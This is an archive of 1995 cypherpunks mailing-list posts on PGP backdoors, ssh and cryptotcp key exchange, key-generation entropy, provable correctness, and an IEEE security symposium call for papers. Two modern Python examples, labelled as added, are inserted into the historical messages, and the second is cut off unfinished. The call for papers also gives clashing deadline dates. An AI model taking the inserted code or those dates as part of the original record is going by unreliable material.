MIME-Version: 1.0
Content-Type: text/plain


In article <1ef_9507281405@gigo.com> you write:

> Suddenly, @news.demon.co.uk, which has worked well for ages, is rejecting
> posts:


I've posted a message about this to a local demon newsgroup.   I
haven't seen any announcement about withdrawing mail2news access from
non-Demon subscribers.  

The mail2news gateway has been abused with spam  from some large ISPs
(guess which one? ), but Demon's policy seems to be that they deal with
such problems on an individual or site basis.

It is possible there was a configuration error at demon which may have
been fixed by now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 1 Aug 95 09:55:43 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
In-Reply-To: <199508011615.MAA19157@clark.net>
Message-ID: <199508011655.MAA00520@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "rjc" == Ray Cromwell <rjc@clark.net> writes:

 rjc>   That's a neat metaphor, but it doesn't always apply. It
 rjc> shouldn't apply to algorithms which are primitive
 rjc> recursive. Elementary algorithms like multiprecision add, sub,
 rjc> multiply, divide, modmult, and modexp (the basis of public key
 rjc> encryption) are all provably correct and all terminate. (the
 rjc> basis is polynomial operators over a ring) It is possible to
 rjc> verify the implementation (assuming the correctness of the
 rjc> compiler). Now there could be a "factoring" trapdoor in RSA, but
 rjc> that's a trapdoor not in the implementation of PGP, but in the
 rjc> algorithm itself. RSA-in-4-lines-perl is probably provably
 rjc> correct.  To guard against trapdoors in PGP, you should verify
 rjc> the correctness of the PRNG, Key Generator, and that no private
 rjc> key bits or session key bits are leaked. I would suspect this
 rjc> could be difficult, but approximations could be determined to
 rjc> within a high degree of confidence.

As I suggested, you could 1) only use algorithms which are provably as
hard to break as known hard problems, and 2) only use implementations
which are proven correct.  PGP does neither.  In addition, the
complexity of the source makes #2 difficult even to approximate.

Now, we could certainly take care of #1 fairly easily by using a
different set of algorithms.  And as you suggest, #2 can be
approximated if the code is written cleanly.  But this would be a big
project, and it would not be PGP.

I personally would find such a project pointless, since I trust PGP
enough for my needs.  The availability of the source is a necessary
prerequisite for that trust, but it is by no means convincing.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 1 Aug 95 09:58:30 PDT
To: cypherpunks@toad.com
Subject: IEEE Symp on Security and Privacy - Call for papers
Message-ID: <v02120d01ac440a313f1f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>From: zurko@osf.org (Mary Ellen Zurko)
>Subject: IEEE Symp on Security and Privacy - Call for papers
>To: www-buyinfo@allegra.att.com
>Date: Tue, 1 Aug 95 9:29:33 EDT
>Cc: zurko@osf.org (Mez)
>Mailer: Elm [revision: 70.85]
>
>                           CALL FOR PAPERS
>
>1996 IEEE Symposium on                              May 6-8, 1996
>Security and Privacy                            Oakland, California
>
>                             sponsored by
>  IEEE Computer Society Technical Committee on Security and Privacy
>                         in cooperation with
>    The International Association for Cryptologic Research (IACR)
>
>Since 1980, the Symposium on Security and Privacy has been the premier
>forum for presenting developments in computer security and for
>bringing together researchers and practitioners in the field.
>
>This year, we seek to build upon this tradition of excellence by
>re-emphasizing work on engineering and applications as well as
>theoretical advances.  We also seek to broaden the scope of the
>Symposium by introducing additional topics.  We want to hear not only
>about new theoretical results, but also about work in the design and
>implementation of secure systems and work on policy relating to system
>security.  We are particularly interested in papers on policy and
>technical issues relating to privacy in the context of the Information
>Infrastructure, papers on securing unsecure applications and operating
>systems, papers that relate software and system engineering technology
>to the design of secure systems, and papers on hardware and
>architectural support for secure systems.
>
>The symposium will focus on technical aspects of security and privacy
>as they arise in commercial and industrial applications, as well as in
>government and military systems.  It will address advances in the
>theory, design, implementation, analysis, and application of secure
>computer systems, and in the integration and reconciliation of
>security and privacy with other critical system properties such as
>reliability, performance, and safety.  Topics in which papers and
>panel session proposals are invited include, but are not limited to,
>the following:
>
>
>Secure systems          Privacy Issues          Access controls
>Security verification   Network security        Policy modeling
>Information flow        Authentication          Database security
>Data integrity          Security Protocols      Viruses and worms
>Auditing                Biometrics              Smartcards
>Commercial and industrial security              Intrusion Detection
>Security and other critical system properties   Distributed systems security
>Novel applications of cryptography and other security techniques
>
>We will continue the session of very brief (5-minute) talks introduced
>last year.  Our goal is to make it possible for us to hear from people
>who are advancing the field in the areas of system design and
>implementation, and who would like to present their ideas to the
>symposium audience but may lack the time and resources needed to
>prepare a full paper.  Submissions for this session will be accepted
>up to April 2, 1996 to permit us to hear of the most recent
>developments. Abstracts of these talks will be distributed at the
>conference.
>
>INSTRUCTIONS TO AUTHORS:
>
>Send six copies of your paper and/or proposal for a panel session to
>John McHugh, Program Co-Chair, at the address given below.  Papers and
>panel proposals must be received by November 6, 1996.  Papers, which
>should include an abstract, must not exceed 7500 words.  The names and
>affiliations of the authors should appear on a separate cover page
>only, as a ``blind'' refereeing process is used.  In addition to the
>paper submission, an ASCII copy of the paper title and abstract should
>be sent to the Program Co-Chair (mchugh@cs.pdx.edu) by electronic mail.
>These will be distributed electronically (without author
>identification) to the entire program committee to aid in the
>appropriate assignment of referees. Authors must certify prior to
>December 25, 1996 that any and all necessary clearances for
>publication have been obtained.
>
>Papers must report original work that has not been published
>previously, and is not under consideration for publication elsewhere.
>Abstracts, overlength papers, electronic submissions, late
>submissions, and papers that cannot be published in the proceedings
>will be rejected without review.  Authors will be notified of
>acceptance by January 16, 1996.  Camera-ready copies are due not later
>than March 4, 1996.
>
>Panel proposals should describe, in two pages or less, the objective
>of the panel and the topic(s) to be addressed.  Names and addresses of
>potential panelists (with position abstracts if possible) and of
>the moderator should also be included.  Panels are not intended to
>serve as alternate paper sessions and it is expected that, with the
>possible exception of an overview of the topic area by the panel
>chair, individual presentations by panel members will be limited to
>five to ten minutes and that at least one third of the session will be
>reserved for discussion.
>
>Submitters of abstracts for the special session of five-minute talks
>should submit one page abstracts to John McHugh, Program Co-Chair, at
>the address given below.  The abstract should be one page or less;
>Email submissions of 30 to 60 lines are preferred. Abstracts must be
>received by April 2, 1996.  Authors will be notified of acceptance or
>rejection of abstracts by April 16.  Submitted abstracts that are
>accepted will be distributed at the conference.  Presenters of
>five-minute talks are expected to register for the conference.
>Overtly commercial presentations are inappropriate.
>
>The Symposium will also include informal poster sessions where
>preliminary or speculative material, and descriptions or
>demonstrations of software, may be presented.  Send one copy of your
>poster session paper to Dale Johnson, at the address given below, by
>January 31, 1996, together with certification that any and all
>necessary clearances for presentation have been obtained.
>
>Again this year, we will attempt to counsel prospective authors.  If
>you have questions about whether or how to present your work to the
>symposium, please send email to the Chair (dmj@mitre.org), and we will
>do our best to assist you.
>
>Information about this conference will also be available by
>anonymous ftp from ftp.cs.pdx.edu in directory /pub/SP96, on the web
>at http://www.cs.pdx.edu/SP96. The program chairs can be reached by
>email at sp96@cs.pdx.edu.
>
>PROGRAM COMMITTEE
>
>Dave Bailey, Galaxy Computer Services, USA
>Terry Vickers Benzel, TIS, USA
>Lee A. Benzinger, Loral, USA
>Debbie Cooper, DMCooper, USA
>Oliver Costich, Independent Consultant, USA
>Yves Deswarte, LAAS-CNRS & INRIA, FR
>Jim Gray, Hong Kong U. of Sci. and Tech, HK
>Lee Gong, SRI, USA
>Sushil Jajodia, GMU, USA
>Paul Karger, GTE, USA
>Carl Landwehr, NRL, USA
>John McLean, NRL, USA
>Catherine A. Meadows, NRL, USA
>Rich Neely, CTA, USA
>Sylvan S. Pinsky, DoD, USA
>Mike Reiter, AT&T, USA
>Sue Rho, TIS, USA
>Peter  Ryan, DRA, UK
>Tom Schubert, Portland State Univ., USA
>Stuart Stubblebine, AT&T, USA
>Elisabeth Sullivan, Sequent, USA
>Tom Van Vleck, Taligent, USA
>Vijay Varadharajan, Univ. of Western Sydney, AU
>Yacov Yacobi, Bellcore, USA
>Raphael Yahalom, Hebrew University, Israel
>Mary Ellen Zurko, OSF, USA
>
>
>For further information concerning the symposium, contact:
>
>
>  Dale Johnson, General Chair        John McHugh, Program Co-Chair
>  The MITRE Corporation              Computer Science Department
>  Mailstop A156                      Portland State University
>  202 Burlington Rd                  P.O. Box 751
>  Bedford, MA 01730-1420, USA        Portland OR 97207-0751, USA
>  Tel: +1 (617) 271-8894             Tel: +1 (503) 725-5842
>  Fax: +1 (617) 271-3816             Fax: +1 (503) 725-3211
>  dmj@mitre.org                      mchugh@cs.pdx.edu
>
>  Steve Kent, Vice Chair             George Dinolt, Program Co-Chair
>  BBN Systems and Technologies       Loral WDL
>  Mailstop 13/2a                     P.O. Box 49041, MS X20
>  70 Fawcett Street                  San Jose, CA 95161-9041
>  Cambridge, MA 02138                Tel: +1 (408) 473-4150
>  Tel: +1 (617) 873-6328             Fax: +1 (408) 473-4272
>  Fax: +1 (617) 873-4086             dinolt@wdl.loral.com
>  kent@bbn.com
>
>  Charles Payne, Treasurer
>  Secure Computing Corporation
>  2675 Long Lake Road
>  Roseville, MN  55113
>  Tel: +1 (612) 628-1594
>  Fax: +1 (612) 628-2701
>  cpayne@sctc.com
>
>  Peter Ryan, European Contact       Jim Gray, Asia/Pacific Contact
>  Defence Research Agency            Department of Computer Science
>  Room NX17                          Hong Kong Univ. of Science & Technology
>  St Andrew's Rd                     Clear Water Bay, Kowloon, Hong Kong
>  Malvern                            Tel: +852 358-7012
>  Worcs WR14 3PS,UK                  Fax: +852 358-1477
>  Tel +44 (0684) 895845              gray@cs.ust.hk
>  Fax +44 (0684) 894303
>  ryan@rivers.dra.hmg.gb
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 31 Jul 95 22:17:22 PDT
To: Matthew Ghio <ghio@cmu.edu>
Subject: Re: ssh protocol
In-Reply-To: <9507312036.AA08394@toad.com>
Message-ID: <Pine.LNX.3.91.950801124040.12351B-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Matthew Ghio wrote:

> Tatu Ylonen <ylo@cs.hut.fi> wrote:
> > The basic idea behind the protocol goes roughly like this:
> >   1. Exchange session keys using Diffie-Hellman
> >   2. Each side sends a signature of the Diffie-Hellman exchange (the
> >      signature can be with any of a number of algorithms; RSA and
> >      Elliptic Curve systems have been defined).
> 
> I've been playing with the cryptotcp program available from utopia..  It
> has some bugs but works pretty well, if you don't mind waiting 20-30
> seconds at the beginning.  It does a Diffie-Hellman exchange and 3DES over
> telnet.  How hard would it be to add some sort of authentication to this
> program?

Yes, I'm interested too, also because cryptotcp looks like a good
candidate as component of my "SafeSox" pet project, to make unmodified TCP
applications secure. Apparently, a sockd daemon could be easily modified
to open encrypted TCP connections to remote cryptod daemons, instead of
targeting remote servers directly. The next logical step would be a
Winsock (or Mac) version of that cryptified sockd, to be run on the same
PC where the applications live (not everybody has a UNIX box on the same
network). No modifications would be required in cryptod: 


Unmod. --- [socksifying DLL] === [crypto-sockd] ~~~~ [cryptod] +++ [server]
Winsock 
Client

--- = local API call
=== = local SOCKS connection (same network or same machine)
~~~ = cryptotcp connection across the Internet
+++ = cleartext TCP connection on the same network or same machine

Another area where I would appreciate analysis by someone more competent
than myself is cryptotcp's random key generator. Even though the
randomizer (in random.c) is called several times, stirring in the pool
also quantities of entropy depending on the time spent during the
establishment of the TCP connection, I doubt that the total resulting
entropy can be that high.  Perhaps, adding some purely local data a' la
randseed.bin (not available to an eavesdropper) would reduce the risk of
the scheme being brute-forced. 
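
Added example (not part of the original post, and not cryptotcp's code): a conservative entropy ledger for a key-generation pool of the kind discussed above, showing why connection-timing samples alone fall short of a 3DES key and what a secret local seed file contributes. The timing figures, the 24-byte seed and all names are assumptions constructed for the illustration.

```python
import hashlib
import math

# Assumptions for the illustration (constructed values, not measurements):
CLOCK_RESOLUTION_US = 1        # granularity of the local clock
EAVESDROPPER_WINDOW_US = 512   # how closely a wire observer can place each event
KEY_BITS = 168                 # 3DES, assuming three independent 56-bit keys

# Constructed sample: microsecond timestamps taken during connection setup.
SAMPLE_TIMINGS_US = [20113, 20977, 48230, 51044, 93310, 97655]
# Constructed stand-in for a secret, uniformly random 24-byte local seed file.
SAMPLE_LOCAL_SEED = bytes.fromhex(
    "3c9a51e07bd2486fa1057e93c46d0b28f7e16a3d905cb842")


class InsufficientEntropy(Exception):
    """Raised when a key is requested before enough entropy was credited."""


def timing_credit_bits(window_us, resolution_us):
    """Upper bound on the bits one timestamp hides from an observer who can
    already place the event within window_us of its true value."""
    if window_us <= resolution_us:
        return 0.0
    return math.log2(window_us / resolution_us)


class Pool:
    """Hash-based pool that tracks how much entropy it can honestly claim."""

    CAPACITY_BITS = 256.0  # a SHA-256 state cannot hold more than this

    def __init__(self):
        self._state = hashlib.sha256(b"pool-init").digest()
        self.credited_bits = 0.0

    def stir(self, data, credit_bits):
        # Length-prefix the input so adjacent inputs cannot be re-split.
        framed = len(data).to_bytes(4, "big") + data
        self._state = hashlib.sha256(self._state + framed).digest()
        self.credited_bits = min(self.CAPACITY_BITS,
                                 self.credited_bits + credit_bits)

    def _output(self, label, nbytes):
        out, counter = b"", 0
        while len(out) < nbytes:
            block = self._state + label + bytes([counter])
            out += hashlib.sha256(block).digest()
            counter += 1
        return out[:nbytes]

    def derive_key(self, nbytes, min_bits):
        """Refuse to hand out a key the ledger cannot back."""
        if self.credited_bits < min_bits:
            raise InsufficientEntropy(
                "pool holds at most %.0f bits, key needs %d"
                % (self.credited_bits, min_bits))
        return self._output(b"session-key", nbytes)

    def next_seed(self, nbytes):
        """Replacement contents for the seed file, so no seed is used twice."""
        return self._output(b"next-seed", nbytes)


def build_pool(timings_us, local_seed=None):
    """Stir in every timing sample and, optionally, the local seed file."""
    pool = Pool()
    per_sample = timing_credit_bits(EAVESDROPPER_WINDOW_US, CLOCK_RESOLUTION_US)
    for t in timings_us:
        pool.stir(t.to_bytes(8, "big"), per_sample)
    if local_seed is not None:
        # Full credit holds only if the file is random and never leaves the host.
        pool.stir(local_seed, 8 * len(local_seed))
    return pool


if __name__ == "__main__":
    for label, seed in (("timing only", None),
                        ("timing + local seed", SAMPLE_LOCAL_SEED)):
        pool = build_pool(SAMPLE_TIMINGS_US, seed)
        try:
            pool.derive_key(24, KEY_BITS)
            verdict = "key issued"
        except InsufficientEntropy as exc:
            verdict = "refused: %s" % exc
        print("%-20s %5.0f bits credited -> %s"
              % (label, pool.credited_bits, verdict))
```

The ledger is an upper bound, not a measurement: calling the randomizer more often raises the credit only by what each sample can actually hide from someone watching the wire.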




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 1 Aug 95 04:25:29 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <9508011120.AA11301@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> 	Clever back doors are not accomplished by an obvious program
> change, but rather by the subtle use of some technique that appears to
> do one thing when it actually does something else.  As a good example, a
> subtle interaction with the rest of the environment could modify the key
> generation algorithm after it is loaded.  Unfortunately, PGP is too
> large to verify against such back doors, so I ask again:
> 
> 	Why (specifically) do you think the MIT version of PGP has no
> backdoors and is not subject to attacks such as the one outlined in my
> previous posting?


This is a good question. 

Subtle backdoors hidden in such a program may be difficult to find out.
It might be more effective to use the PGP file format, to understand
pgp as a reference implementation, and to write your own pgp compatible
program where you can generate your keys etc. in the way you prefer.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 1 Aug 95 04:35:47 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <9508011127.AA11306@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> This is where you are very wrong.  I am not saying that "if you can't
> find any holes it must be secure".  What I am saying is that the
> source is available, and thousands of people have looked at the
> source, and none of them have found any holes in it.


It is definitely much more difficult to implant a backdoor into a program
which is available as source code than into a black box. 

BTW: Has anyone ever found a modified and weakened version of pgp ?


Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 1 Aug 95 04:45:31 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <9508011130.AA11309@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> >However, to help derail this V-chip being mandated, what if we (I mean
> >activists, writers of columns, etc.) "insisted" that _commercials_ be
> >similarly labelled?
> 
> I love it.  Great idea, Tim!


Someone in Germany developed a device which stops the VTR while they are
showing the commercials, but it isn't available yet.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 1 Aug 95 12:48:25 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: U.S. Banks are not all that bad
In-Reply-To: <v02120d01ac4219a2e38e@[199.2.22.120]>
Message-ID: <9508011938.AA12258@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Douglas Barnes writes:
>At First Interstate recently, I had to make a withdrawal from
>the teller, as the ATM was broken. Their policy _does_
>require a "counter check", and normally they charge, but when
>I explained that the ATM was kaput they did it for free.
>It is _much_ cheaper for them if you use the ATM, and this
>kind of policy is designed to encourage you to do this. It's
>the kind of thing that the market will sort out nicely --
>if it irritates people and loses them money more than it
>saves them money, they will stop doing it.

Sure they're happier if you use the ATM.  It costs them less
per transaction, plus they *charge* you to use the damn thing.
How many people do you think would put up with $1.00 or $1.25
to do a transaction at a human teller?  Most banks charge about
that much for "foreign" (other than those they own) ATM use.
Some even charge that much for *all* ATM use if you don't get
the "premium" accounts.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 1 Aug 95 14:50:03 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: a hole in PGP
Message-ID: <199508012145.OAA05756@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>It is definitely much more difficult to implant a backdoor into a program
>which is available as source code than into a black box. 
>
>BTW: Has anyone ever found a modified and weakened version of pgp ?

Not that I know of, but there were some versions with a bug in the random-input
generation - I forget if that was with ~2.2 or ~2.6.0; Colin Plumb had something
to do with it.  I've recently acquired ViaCrypt 2.7.1 for WinDows, and one
nice feature is that in addition to typing in random keystrokes, you can click
your mouse in a box and wave it around to input randomness.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 1 Aug 95 14:49:14 PDT
To: Nathan Zook <nzook@bga.com>
Subject: Re: OS noise  [Was: a hole in PGP]
Message-ID: <199508012146.OAA05789@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Mon, 31 Jul 1995, Phil Fraering wrote:
>
>> For better or for worse, we all must use programs (or collections
>> of programs) that large or larger: even if PGP could be implemented
>> in 1 % of the current source code, it would still be running in an
>> operating system that's cramped in 4 megabytes of ram, because that's
>> a characteristic of the common modern operating systems.
>
>Ahem!  Commiedore APOLOGIZED when it released its 512K OS a couple of
>years ago.  These things _don't_ have to be this large.

Foo.  Unix used to work just fine in 64K+64K split I&D space on a PDP-11 :-)
It got bigger when lots of stuff was added, especially networking and 
X windows, and I wouldn't want to go back to small machines.  

However, during one such discussion on comp.unix.wizards or wherever,
Dennis Ritchie posted a nice article about "Mine is smaller than yours",
saying "here's how big my OS is" (I think ~250K, and the OS was 8th or 9th
Edition), "telnet over to foovax, it's this big", "datakit over to barmips,
it's that big", "some other networking method over to some other machine,
it's that big", "yet another protocol over to yet another bigger machine",
"display size of the operating systems on my 256K Blit and Gnot terminal", etc.

And QNX's kernel fits just fine inside the cache on a 486,
though it wouldn't actually stay there much.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 1 Aug 95 14:50:17 PDT
To: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Subject: Re: a hole in PGP
Message-ID: <199508012146.OAA05807@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>	Now, my knowledge, time and resources are limited. I see that MIT
>or whomever has made a program that, under test, is more secure than my
>XOR 00000000 implementation. I may not fully trust them but it is better
>than anything I could come out with.

Foo.  Clipper is better than anything I could come up with from scratch,
and it's provably untrustable.  (I could easily build better stuff out of
existing pieces like DES and IDEA, but that's a separate issue.)
Even Enigma's pretty strong, and look what it got its users...
Some of Dr. Fred's distrust is well-founded.

DES is also pretty good, and it's looking less and less likely that there's
a secret NSA backdoor in it (other than differential cryptanalysis
and maybe linear cryptanalysis), but it and IDEA and MD5 fundamentally depend on
messiness and obscurity for their security (plus elimination of obvious holes.)
Maybe the authors of IDEA are paid by the same space aliens who really run NSA?

RSA has some provable strength to it, though it's not totally risk-free.
(One Time Pads do too, and yet people manage to misunderstand and
misimplement them almost as much as they mishandle keys.)  If you want a
provably strong cryptosystem, you could build one out of pure RSA, which
would merely be painfully slow, but could be usable.  Or you could build a
Blum-Blum-Shub Random Number generator, and use it to generate one-time-pads
(putting BBS into PGP version N+1 would be interesting...)

However, the real weak point of PGP doesn't appear to be the algorithms, or
the implementation (except ease-of-use issues); it's attacks on the
computers themselves.
TEMPEST is fun, if difficult and expensive, black-bag-jobs on keyboards
are easy and effective if you're a good housebreaker, and you can always
try viruses and trojan horses to distribute keystroke-stealers.
I seem to remember that Dr. Fred was once a proponent of using viruses for
good purposes for propagation of information or whatever?  Anathema!
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Crypto in 3-4 lines of perl --> http://dcs.ex.ac.uk/~aba/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 12:19:05 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <ac43be3d13021004ec3b@[205.199.118.202]>
Message-ID: <9508011911.AA11465@all.net>
MIME-Version: 1.0
Content-Type: text


...
> >PGP, but in the algorithm itself. RSA-in-4-lines-perl is probably
>                                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >provably correct.  To guard against trapdoors in PGP, you should
>  ^^^^^^^^^^^^^^^^^
> >verify the correctness of the PRNG, Key Generator, and that no private
...
> This doesn't seem likely. I mean, doesn't "RSA-in-4-lines-of-Perl" *of
> necessity* make use of external library/utility functions? Such as the "dc"
> math routines for the PRNG? Part of its compactness is that it makes use of
> available libraries.

This issue is an interesting one and one worthy of being addressed. 
There are a couple of concerns here (I approximately quote from a
submitted paper on the secure W3 server with quotation marks):

Concern 1:
	"The secure (program) is designed in such a way that we can
	demonstrate (subject to the propriety of compilers, operating
	system functions, and other things in the environment) that once
	the daemon is started, only the desired effects result."

Concern 2:
	The environment has an insecurity specific to the secure
	program used as a means of subverting the function of the
	secure program.

I pretty much believe that Concern 1 should be addressed by all programs
that claim to be secure.  That is, subject to the rest of the world working
right, the secure program works right.

I believe that concern 2 should be addressed by all programs that claim
to be secure in a particular environment.  That is, beyond being secure
assuming the environment is secure, we might want to eliminate the
assumption about the environment by showing it to be justified.  In
terms of attacking systems, it is necessary to subvert many different
environments for this issue to be important for widespread use of PGP,
or at least to subvert several of the more common environments (such as
what the Thompson c compiler mentioned in his Turing award talk did).

> Anything that "reaches out" to external libraries or utilities would then
> have the vulnerabilities of _those_ libraries and utilities, which may or
> may not be provably correct themselves. (And the issue of any PRNG being
> probably correct or not is of course an interesting, and deep, question.)
> 
> I do think the issues of modular design and provable correctness--or
> approximations to it--are interesting ones.

I think that this issue can generally be addressed by a divide and
conquer strategy.  Prove that the called routines are correct and
confined under all possible parameters, do the same for the calling
routines, do the same for the interaction between them, and I think you
have it.  This is pretty easy for one or two routines, but when you take
the OS into account, the C compiler into account, the program itself
into account, and the external environment into account, you run into
some serious limitations.  For example, you may (in some cases) have to
show that under all possible sequences of interrupt timings and stack
conditions, the system operates correctly (which almost none currently
do).  Unless you design with this sort of thing in mind, it's very hard
to demonstrate these properties even for limited subproblems. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 1 Aug 95 12:25:27 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <ac43be3d13021004ec3b@[205.199.118.202]>
Message-ID: <199508011915.PAA02085@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



[Tim responds to my note on "provably correct implementation"]

> 
> Anything that "reaches out" to external libraries or utilities would then
> have the vulnerabilities of _those_ libraries and utilities, which may or
> may not be provably correct themselves. (And the issue of any PRNG being
> probably correct or not is of course an interesting, and deep, question.)
> 

  What I meant by my message is in some circumstances, an implementation
can be proven correct (i.e. to do what it says it does correctly).  What
I mean by implementation is the source at the highest level, not the
module dependencies which are abstractly disconnected from the application.
(e.g. if a multiprecision math library that comes with the operating
system is used by PGP, the source to PGP could be said to be "trapdoor free"
even if the math library has an NSA monitoring function built into it)

 Each layer of course relies on the correctness of the layer beneath it, much
like a theorem proof relies on the proof of the statements that makes it
up. Thus, RSA-in-4-lines can be observed to be a correct implementation
of RSA without any trapdoors (like secretly storing or leaking private
key bits) at the level of its source code. Of course, the Perl interpreter
itself would have to be proven correct, but we assume that no RSA trap
doors have been put into perl because perl was available long before
PGP and RSA-in-4-lines perl and is widely distributed. The probability
of a trapdoor in perl is small.


The hierarchy looks like this:

RSA-in-4-lines :: DEPENDS_ON_CORRECTNESS_OF { Perl, DC, RSA_Algorithms }

Perl :: DEPENDS_ON_CORRECTNESS_OF { C, Unix, Perl_Algorithms }
DC :: DEPENDS_ON_CORRECTNESS_OF { C, Unix, DC_Algorithms }

C :: DEPENDS_ON_CORRECTNESS_OF { C_compiler } 
C_compiler :: DEPENDS_ON_CORRECTNESS_OF { Assembler }
Assembler :: DEPENDS_ON_CORRECTNESS_OF { instruction_set }
instruction_set :: DEPENDS_ON_CORRECTNESS_OF { hardware }

Now even if it were possible to prove the correctness of all those layers
(which I find doubtful. Some kind of Goedel/Turing limitation is going to turn
up somewhere), what if the 'hardware' isn't correct? (e.g. Pentium bug)
There could be a one-in-a-zillion bug that randomly leaks keybits. 

IMHO, there's no sense in worrying about stuff like this. If your data
is so valuable that you need absolute theoretical security, use a 
one-time-pad with a simple redundant provably secure device
(also shielded from TEMPEST attacks), and have the thing implanted
in your skull. ;-)


-Ray
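
Added example (not part of the original post): the hierarchy above, parsed as written and closed transitively, to list everything RSA-in-4-lines ends up trusting, which of those components the message gives no further justification for, and which correctness arguments fail if one layer is faulty. The function names are assumptions made for the illustration.

```python
import re

# The dependency statements exactly as they appear in the message above.
HIERARCHY = """\
RSA-in-4-lines :: DEPENDS_ON_CORRECTNESS_OF { Perl, DC, RSA_Algorithms }

Perl :: DEPENDS_ON_CORRECTNESS_OF { C, Unix, Perl_Algorithms }
DC :: DEPENDS_ON_CORRECTNESS_OF { C, Unix, DC_Algorithms }

C :: DEPENDS_ON_CORRECTNESS_OF { C_compiler }
C_compiler :: DEPENDS_ON_CORRECTNESS_OF { Assembler }
Assembler :: DEPENDS_ON_CORRECTNESS_OF { instruction_set }
instruction_set :: DEPENDS_ON_CORRECTNESS_OF { hardware }
"""

STATEMENT = re.compile(
    r"^\s*(\S+)\s*::\s*DEPENDS_ON_CORRECTNESS_OF\s*\{([^}]*)\}\s*$")


def parse(text):
    """Return {component: set of components it directly depends on}."""
    deps = {}
    for number, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        match = STATEMENT.match(raw)
        if match is None:
            raise ValueError("line %d is not a dependency statement: %r"
                             % (number, raw))
        names = {n.strip() for n in match.group(2).split(",") if n.strip()}
        deps.setdefault(match.group(1), set()).update(names)
    return deps


def trusted_base(deps, root):
    """Everything whose correctness `root` relies on, directly or not.
    The `seen` set also makes the walk terminate on circular statements."""
    seen, stack = set(), [root]
    while stack:
        for dep in deps.get(stack.pop(), ()):
            if dep not in seen:
                seen.add(dep)
                stack.append(dep)
    return seen


def unjustified(deps, root):
    """Trusted components for which no further dependency is stated:
    the points where the argument rests on assumption alone."""
    return {c for c in trusted_base(deps, root) if c not in deps}


def undermined_by(deps, faulty):
    """Components whose correctness argument fails if `faulty` is wrong."""
    return {c for c in deps if faulty in trusted_base(deps, c)}


if __name__ == "__main__":
    deps = parse(HIERARCHY)
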